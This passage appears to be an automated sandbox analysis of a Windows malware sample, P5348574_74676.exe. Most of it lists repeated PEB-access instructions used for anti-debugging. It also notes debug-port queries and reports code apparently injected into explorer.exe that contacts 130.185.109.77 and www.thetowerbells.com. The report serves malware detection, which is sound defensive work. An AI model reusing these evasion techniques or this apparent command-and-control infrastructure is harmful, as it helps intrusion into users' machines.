          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E03E2 mov eax, dword ptr fs:[00000030h]2_2_017E03E2
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E03E2 mov eax, dword ptr fs:[00000030h]2_2_017E03E2
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E03E2 mov eax, dword ptr fs:[00000030h]2_2_017E03E2
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E03E2 mov eax, dword ptr fs:[00000030h]2_2_017E03E2
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01888B58 mov eax, dword ptr fs:[00000030h]2_2_01888B58
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E4BAD mov eax, dword ptr fs:[00000030h]2_2_017E4BAD
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E4BAD mov eax, dword ptr fs:[00000030h]2_2_017E4BAD
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E4BAD mov eax, dword ptr fs:[00000030h]2_2_017E4BAD
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E2397 mov eax, dword ptr fs:[00000030h]2_2_017E2397
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EB390 mov eax, dword ptr fs:[00000030h]2_2_017EB390
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C1B8F mov eax, dword ptr fs:[00000030h]2_2_017C1B8F
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C1B8F mov eax, dword ptr fs:[00000030h]2_2_017C1B8F
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F927A mov eax, dword ptr fs:[00000030h]2_2_017F927A
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B9240 mov eax, dword ptr fs:[00000030h]2_2_017B9240
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B9240 mov eax, dword ptr fs:[00000030h]2_2_017B9240
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B9240 mov eax, dword ptr fs:[00000030h]2_2_017B9240
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B9240 mov eax, dword ptr fs:[00000030h]2_2_017B9240
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F4A2C mov eax, dword ptr fs:[00000030h]2_2_017F4A2C
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F4A2C mov eax, dword ptr fs:[00000030h]2_2_017F4A2C
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA229 mov eax, dword ptr fs:[00000030h]2_2_017DA229
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA229 mov eax, dword ptr fs:[00000030h]2_2_017DA229
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA229 mov eax, dword ptr fs:[00000030h]2_2_017DA229
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA229 mov eax, dword ptr fs:[00000030h]2_2_017DA229
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA229 mov eax, dword ptr fs:[00000030h]2_2_017DA229
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA229 mov eax, dword ptr fs:[00000030h]2_2_017DA229
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA229 mov eax, dword ptr fs:[00000030h]2_2_017DA229
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA229 mov eax, dword ptr fs:[00000030h]2_2_017DA229
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA229 mov eax, dword ptr fs:[00000030h]2_2_017DA229
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D3A1C mov eax, dword ptr fs:[00000030h]2_2_017D3A1C
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B5210 mov eax, dword ptr fs:[00000030h]2_2_017B5210
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B5210 mov ecx, dword ptr fs:[00000030h]2_2_017B5210
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B5210 mov eax, dword ptr fs:[00000030h]2_2_017B5210
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B5210 mov eax, dword ptr fs:[00000030h]2_2_017B5210
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017BAA16 mov eax, dword ptr fs:[00000030h]2_2_017BAA16
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017BAA16 mov eax, dword ptr fs:[00000030h]2_2_017BAA16
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C8A0A mov eax, dword ptr fs:[00000030h]2_2_017C8A0A
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0187AA16 mov eax, dword ptr fs:[00000030h]2_2_0187AA16
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0187AA16 mov eax, dword ptr fs:[00000030h]2_2_0187AA16
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E2AE4 mov eax, dword ptr fs:[00000030h]2_2_017E2AE4
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E2ACB mov eax, dword ptr fs:[00000030h]2_2_017E2ACB
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017CAAB0 mov eax, dword ptr fs:[00000030h]2_2_017CAAB0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017CAAB0 mov eax, dword ptr fs:[00000030h]2_2_017CAAB0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EFAB0 mov eax, dword ptr fs:[00000030h]2_2_017EFAB0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0187EA55 mov eax, dword ptr fs:[00000030h]2_2_0187EA55
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01844257 mov eax, dword ptr fs:[00000030h]2_2_01844257
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B52A5 mov eax, dword ptr fs:[00000030h]2_2_017B52A5
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B52A5 mov eax, dword ptr fs:[00000030h]2_2_017B52A5
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B52A5 mov eax, dword ptr fs:[00000030h]2_2_017B52A5
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B52A5 mov eax, dword ptr fs:[00000030h]2_2_017B52A5
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B52A5 mov eax, dword ptr fs:[00000030h]2_2_017B52A5
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0186B260 mov eax, dword ptr fs:[00000030h]2_2_0186B260
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0186B260 mov eax, dword ptr fs:[00000030h]2_2_0186B260
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017ED294 mov eax, dword ptr fs:[00000030h]2_2_017ED294
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017ED294 mov eax, dword ptr fs:[00000030h]2_2_017ED294
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01888A62 mov eax, dword ptr fs:[00000030h]2_2_01888A62
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DC577 mov eax, dword ptr fs:[00000030h]2_2_017DC577
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DC577 mov eax, dword ptr fs:[00000030h]2_2_017DC577
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_018805AC mov eax, dword ptr fs:[00000030h]2_2_018805AC
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_018805AC mov eax, dword ptr fs:[00000030h]2_2_018805AC
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D7D50 mov eax, dword ptr fs:[00000030h]2_2_017D7D50
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F3D43 mov eax, dword ptr fs:[00000030h]2_2_017F3D43
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E4D3B mov eax, dword ptr fs:[00000030h]2_2_017E4D3B
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E4D3B mov eax, dword ptr fs:[00000030h]2_2_017E4D3B
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E4D3B mov eax, dword ptr fs:[00000030h]2_2_017E4D3B
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C3D34 mov eax, dword ptr fs:[00000030h]2_2_017C3D34
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C3D34 mov eax, dword ptr fs:[00000030h]2_2_017C3D34
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C3D34 mov eax, dword ptr fs:[00000030h]2_2_017C3D34
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C3D34 mov eax, dword ptr fs:[00000030h]2_2_017C3D34
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C3D34 mov eax, dword ptr fs:[00000030h]2_2_017C3D34
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C3D34 mov eax, dword ptr fs:[00000030h]2_2_017C3D34
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C3D34 mov eax, dword ptr fs:[00000030h]2_2_017C3D34
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C3D34 mov eax, dword ptr fs:[00000030h]2_2_017C3D34
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C3D34 mov eax, dword ptr fs:[00000030h]2_2_017C3D34
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C3D34 mov eax, dword ptr fs:[00000030h]2_2_017C3D34
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C3D34 mov eax, dword ptr fs:[00000030h]2_2_017C3D34
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C3D34 mov eax, dword ptr fs:[00000030h]2_2_017C3D34
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C3D34 mov eax, dword ptr fs:[00000030h]2_2_017C3D34
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01836DC9 mov eax, dword ptr fs:[00000030h]2_2_01836DC9
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01836DC9 mov eax, dword ptr fs:[00000030h]2_2_01836DC9
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01836DC9 mov eax, dword ptr fs:[00000030h]2_2_01836DC9
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01836DC9 mov ecx, dword ptr fs:[00000030h]2_2_01836DC9
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01836DC9 mov eax, dword ptr fs:[00000030h]2_2_01836DC9
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01836DC9 mov eax, dword ptr fs:[00000030h]2_2_01836DC9
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017BAD30 mov eax, dword ptr fs:[00000030h]2_2_017BAD30
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0187FDE2 mov eax, dword ptr fs:[00000030h]2_2_0187FDE2
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0187FDE2 mov eax, dword ptr fs:[00000030h]2_2_0187FDE2
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0187FDE2 mov eax, dword ptr fs:[00000030h]2_2_0187FDE2
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0187FDE2 mov eax, dword ptr fs:[00000030h]2_2_0187FDE2
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01868DF1 mov eax, dword ptr fs:[00000030h]2_2_01868DF1
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017CD5E0 mov eax, dword ptr fs:[00000030h]2_2_017CD5E0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017CD5E0 mov eax, dword ptr fs:[00000030h]2_2_017CD5E0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0183A537 mov eax, dword ptr fs:[00000030h]2_2_0183A537
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01888D34 mov eax, dword ptr fs:[00000030h]2_2_01888D34
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0187E539 mov eax, dword ptr fs:[00000030h]2_2_0187E539
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01833540 mov eax, dword ptr fs:[00000030h]2_2_01833540
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01863D40 mov eax, dword ptr fs:[00000030h]2_2_01863D40
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E1DB5 mov eax, dword ptr fs:[00000030h]2_2_017E1DB5
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E1DB5 mov eax, dword ptr fs:[00000030h]2_2_017E1DB5
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E1DB5 mov eax, dword ptr fs:[00000030h]2_2_017E1DB5
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E35A1 mov eax, dword ptr fs:[00000030h]2_2_017E35A1
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EFD9B mov eax, dword ptr fs:[00000030h]2_2_017EFD9B
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EFD9B mov eax, dword ptr fs:[00000030h]2_2_017EFD9B
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B2D8A mov eax, dword ptr fs:[00000030h]2_2_017B2D8A
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B2D8A mov eax, dword ptr fs:[00000030h]2_2_017B2D8A
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B2D8A mov eax, dword ptr fs:[00000030h]2_2_017B2D8A
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B2D8A mov eax, dword ptr fs:[00000030h]2_2_017B2D8A
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B2D8A mov eax, dword ptr fs:[00000030h]2_2_017B2D8A
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E2581 mov eax, dword ptr fs:[00000030h]2_2_017E2581
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E2581 mov eax, dword ptr fs:[00000030h]2_2_017E2581
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E2581 mov eax, dword ptr fs:[00000030h]2_2_017E2581
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E2581 mov eax, dword ptr fs:[00000030h]2_2_017E2581
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EAC7B mov eax, dword ptr fs:[00000030h]2_2_017EAC7B
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EAC7B mov eax, dword ptr fs:[00000030h]2_2_017EAC7B
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EAC7B mov eax, dword ptr fs:[00000030h]2_2_017EAC7B
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EAC7B mov eax, dword ptr fs:[00000030h]2_2_017EAC7B
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EAC7B mov eax, dword ptr fs:[00000030h]2_2_017EAC7B
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EAC7B mov eax, dword ptr fs:[00000030h]2_2_017EAC7B
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EAC7B mov eax, dword ptr fs:[00000030h]2_2_017EAC7B
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EAC7B mov eax, dword ptr fs:[00000030h]2_2_017EAC7B
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EAC7B mov eax, dword ptr fs:[00000030h]2_2_017EAC7B
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EAC7B mov eax, dword ptr fs:[00000030h]2_2_017EAC7B
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EAC7B mov eax, dword ptr fs:[00000030h]2_2_017EAC7B
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D746D mov eax, dword ptr fs:[00000030h]2_2_017D746D
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EA44B mov eax, dword ptr fs:[00000030h]2_2_017EA44B
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EBC2C mov eax, dword ptr fs:[00000030h]2_2_017EBC2C
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01888CD6 mov eax, dword ptr fs:[00000030h]2_2_01888CD6
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01836CF0 mov eax, dword ptr fs:[00000030h]2_2_01836CF0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01836CF0 mov eax, dword ptr fs:[00000030h]2_2_01836CF0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01836CF0 mov eax, dword ptr fs:[00000030h]2_2_01836CF0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_018714FB mov eax, dword ptr fs:[00000030h]2_2_018714FB
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01871C06 mov eax, dword ptr fs:[00000030h]2_2_01871C06
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01871C06 mov eax, dword ptr fs:[00000030h]2_2_01871C06
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01871C06 mov eax, dword ptr fs:[00000030h]2_2_01871C06
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01871C06 mov eax, dword ptr fs:[00000030h]2_2_01871C06
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01871C06 mov eax, dword ptr fs:[00000030h]2_2_01871C06
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01871C06 mov eax, dword ptr fs:[00000030h]2_2_01871C06
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01871C06 mov eax, dword ptr fs:[00000030h]2_2_01871C06
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01871C06 mov eax, dword ptr fs:[00000030h]2_2_01871C06
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01871C06 mov eax, dword ptr fs:[00000030h]2_2_01871C06
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01871C06 mov eax, dword ptr fs:[00000030h]2_2_01871C06
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01871C06 mov eax, dword ptr fs:[00000030h]2_2_01871C06
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01871C06 mov eax, dword ptr fs:[00000030h]2_2_01871C06
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01871C06 mov eax, dword ptr fs:[00000030h]2_2_01871C06
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01871C06 mov eax, dword ptr fs:[00000030h]2_2_01871C06
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0188740D mov eax, dword ptr fs:[00000030h]2_2_0188740D
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0188740D mov eax, dword ptr fs:[00000030h]2_2_0188740D
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0188740D mov eax, dword ptr fs:[00000030h]2_2_0188740D
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01836C0A mov eax, dword ptr fs:[00000030h]2_2_01836C0A
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01836C0A mov eax, dword ptr fs:[00000030h]2_2_01836C0A
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01836C0A mov eax, dword ptr fs:[00000030h]2_2_01836C0A
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01836C0A mov eax, dword ptr fs:[00000030h]2_2_01836C0A
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0184C450 mov eax, dword ptr fs:[00000030h]2_2_0184C450
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0184C450 mov eax, dword ptr fs:[00000030h]2_2_0184C450
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C849B mov eax, dword ptr fs:[00000030h]2_2_017C849B
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01837794 mov eax, dword ptr fs:[00000030h]2_2_01837794
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01837794 mov eax, dword ptr fs:[00000030h]2_2_01837794
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01837794 mov eax, dword ptr fs:[00000030h]2_2_01837794
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017CFF60 mov eax, dword ptr fs:[00000030h]2_2_017CFF60
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017CEF40 mov eax, dword ptr fs:[00000030h]2_2_017CEF40
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DB73D mov eax, dword ptr fs:[00000030h]2_2_017DB73D
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DB73D mov eax, dword ptr fs:[00000030h]2_2_017DB73D
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EE730 mov eax, dword ptr fs:[00000030h]2_2_017EE730
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B4F2E mov eax, dword ptr fs:[00000030h]2_2_017B4F2E
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B4F2E mov eax, dword ptr fs:[00000030h]2_2_017B4F2E
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DF716 mov eax, dword ptr fs:[00000030h]2_2_017DF716
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EA70E mov eax, dword ptr fs:[00000030h]2_2_017EA70E
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EA70E mov eax, dword ptr fs:[00000030h]2_2_017EA70E
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0188070D mov eax, dword ptr fs:[00000030h]2_2_0188070D
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0188070D mov eax, dword ptr fs:[00000030h]2_2_0188070D
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F37F5 mov eax, dword ptr fs:[00000030h]2_2_017F37F5
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0184FF10 mov eax, dword ptr fs:[00000030h]2_2_0184FF10
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0184FF10 mov eax, dword ptr fs:[00000030h]2_2_0184FF10
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01888F6A mov eax, dword ptr fs:[00000030h]2_2_01888F6A
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C8794 mov eax, dword ptr fs:[00000030h]2_2_017C8794
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0184FE87 mov eax, dword ptr fs:[00000030h]2_2_0184FE87
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DAE73 mov eax, dword ptr fs:[00000030h]2_2_017DAE73
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DAE73 mov eax, dword ptr fs:[00000030h]2_2_017DAE73
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DAE73 mov eax, dword ptr fs:[00000030h]2_2_017DAE73
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DAE73 mov eax, dword ptr fs:[00000030h]2_2_017DAE73
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DAE73 mov eax, dword ptr fs:[00000030h]2_2_017DAE73
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C766D mov eax, dword ptr fs:[00000030h]2_2_017C766D
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_018346A7 mov eax, dword ptr fs:[00000030h]2_2_018346A7
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01880EA5 mov eax, dword ptr fs:[00000030h]2_2_01880EA5
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01880EA5 mov eax, dword ptr fs:[00000030h]2_2_01880EA5
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01880EA5 mov eax, dword ptr fs:[00000030h]2_2_01880EA5
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C7E41 mov eax, dword ptr fs:[00000030h]2_2_017C7E41
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C7E41 mov eax, dword ptr fs:[00000030h]2_2_017C7E41
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C7E41 mov eax, dword ptr fs:[00000030h]2_2_017C7E41
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C7E41 mov eax, dword ptr fs:[00000030h]2_2_017C7E41
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C7E41 mov eax, dword ptr fs:[00000030h]2_2_017C7E41
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C7E41 mov eax, dword ptr fs:[00000030h]2_2_017C7E41
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0186FEC0 mov eax, dword ptr fs:[00000030h]2_2_0186FEC0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017BE620 mov eax, dword ptr fs:[00000030h]2_2_017BE620
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01888ED6 mov eax, dword ptr fs:[00000030h]2_2_01888ED6
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EA61C mov eax, dword ptr fs:[00000030h]2_2_017EA61C
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EA61C mov eax, dword ptr fs:[00000030h]2_2_017EA61C
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017BC600 mov eax, dword ptr fs:[00000030h]2_2_017BC600
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017BC600 mov eax, dword ptr fs:[00000030h]2_2_017BC600
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017BC600 mov eax, dword ptr fs:[00000030h]2_2_017BC600
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E8E00 mov eax, dword ptr fs:[00000030h]2_2_017E8E00
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01871608 mov eax, dword ptr fs:[00000030h]2_2_01871608
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E16E0 mov ecx, dword ptr fs:[00000030h]2_2_017E16E0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C76E2 mov eax, dword ptr fs:[00000030h]2_2_017C76E2
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E36CC mov eax, dword ptr fs:[00000030h]2_2_017E36CC
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F8EC7 mov eax, dword ptr fs:[00000030h]2_2_017F8EC7
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0186FE3F mov eax, dword ptr fs:[00000030h]2_2_0186FE3F
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0187AE44 mov eax, dword ptr fs:[00000030h]2_2_0187AE44
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0187AE44 mov eax, dword ptr fs:[00000030h]2_2_0187AE44
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0040CF03 LdrLoadDll,2_2_0040CF03
          Source: C:\Users\user\Desktop\P5348574_74676.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 130.185.109.77 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.thetowerbells.com
